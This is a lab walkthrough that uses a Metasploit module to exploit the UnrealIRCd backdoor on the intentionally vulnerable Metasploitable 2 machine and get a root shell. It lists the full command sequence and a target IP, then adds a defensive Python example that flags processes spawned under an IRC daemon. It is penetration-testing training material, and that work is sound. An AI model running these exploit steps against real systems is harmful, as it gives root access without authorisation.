Metasploitable 2 – Compromise: UnrealIRC

Let's take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

It's worth checking whether Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And let's search for any hits on ‘unrealirc’:

search unrealirc

Great, we have a hit. Let's choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor

We now need to configure it. To see what’s required, use:

show options

Let's set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:

Now let's see if it works by typing ‘run’:

run

Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see, the exploit was successful: we have root access to the Metasploitable box once more.
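
What this compromise looks like from the defender's side, as an added example that is not part of the original post: the shell and anything typed into it (such as ‘hostname’) run as descendants of the IRC daemon, which normally has no reason to spawn processes. The event layout, the sample lines and the daemon process names are constructed assumptions.

```python
# Added example: flag processes descended from an IRC daemon.
# Constructed events in the form "time pid ppid uid comm"; the layout and
# the daemon names below are assumptions, not taken from the original post.
SAMPLE_EVENTS = """\
10:00:01 412 1 0 ircd
10:00:05 800 1 0 sshd
10:00:09 801 800 1000 bash
10:02:17 955 412 0 sh
10:02:17 956 955 0 sh
10:02:31 960 956 0 hostname
10:03:02 970 801 1000 hostname
"""
IRC_DAEMONS = {"ircd", "unrealircd"}  # assumed process names


def parse_events(text):
    """Parse one event per line, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or not all(p.isdigit() for p in parts[1:4]):
            continue
        ts, pid, ppid, uid, comm = parts
        events.append({"ts": ts, "pid": int(pid), "ppid": int(ppid),
                       "uid": int(uid), "comm": comm})
    return events


def irc_ancestor(pid, by_pid):
    """Walk the parent chain; return the pid of an IRC daemon ancestor, if any."""
    seen, cur = set(), by_pid.get(pid)
    while cur and cur["ppid"] not in seen:
        seen.add(cur["pid"])
        parent = by_pid.get(cur["ppid"])
        if parent and parent["comm"] in IRC_DAEMONS:
            return parent["pid"]
        cur = parent
    return None


def find_irc_descendants(events):
    """Return (time, pid, comm, uid) for every process spawned under the daemon."""
    by_pid = {e["pid"]: e for e in events}
    return [(e["ts"], e["pid"], e["comm"], e["uid"])
            for e in events if irc_ancestor(e["pid"], by_pid) is not None]


if __name__ == "__main__":
    for alert in find_irc_descendants(parse_events(SAMPLE_EVENTS)):
        print("ALERT: process under IRC daemon:", alert)
```

The ‘hostname’ run from the ordinary SSH login (pid 970) is not flagged; only the one whose ancestry leads back to the IRC daemon is.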

 

 

 
